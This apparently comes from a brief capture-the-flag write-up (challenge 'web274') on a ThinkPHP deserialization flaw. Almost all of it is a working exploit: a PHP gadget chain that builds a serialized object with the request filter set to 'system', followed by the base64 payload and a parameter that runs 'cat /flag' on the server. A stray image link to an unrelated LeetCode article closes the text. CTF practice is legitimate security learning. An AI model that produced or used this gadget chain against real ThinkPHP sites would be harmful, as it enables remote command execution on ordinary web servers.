web274
thinkphp框架序列化漏洞
EXP
<?php
namespace think;
abstract class Model{protected $append=[];private $data=[];function __construct(){$this->append=["lin"=>["ctf","show"]];$this->data=["lin"=>new Request()];}
}
class Request {protected $hook=[];protected $filter="system";protected $config=['var_ajax'=>'_ajax'];function __construct(){$this->filter="system";$this->config=['var_ajax'=>'lin'];$this->hook=["visible"=>[$this,"isAjax"]];}
}
namespace think\process\pipes;
use think\model\concern\Conversion;
use think\model\Pivot;
class Windows{private $files=[];public function __construct(){$this->files=[new Pivot()];}
}
namespace think\model;
use think\Model;
class Pivot extends Model{}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
?>
?data=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czozOiJsaW4iO2E6Mjp7aTowO3M6MzoiY3RmIjtpOjE7czo0OiJzaG93Ijt9fXM6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6MzoibGluIjtPOjEzOiJ0aGlua1xSZXF1ZXN0IjozOntzOjc6IgAqAGhvb2siO2E6MTp7czo3OiJ2aXNpYmxlIjthOjI6e2k6MDtyOjk7aToxO3M6NjoiaXNBamF4Ijt9fXM6OToiACoAZmlsdGVyIjtzOjY6InN5c3RlbSI7czo5OiIAKgBjb25maWciO2E6MTp7czo4OiJ2YXJfYWpheCI7czozOiJsaW4iO319fX19fQ==&lin=cat /flag
![[算法][数组][leetcode]2391. 收集垃圾的最少总时间](https://img-blog.csdnimg.cn/direct/9846c5262cd14897bd4965c6efb73d64.gif#pic_center)
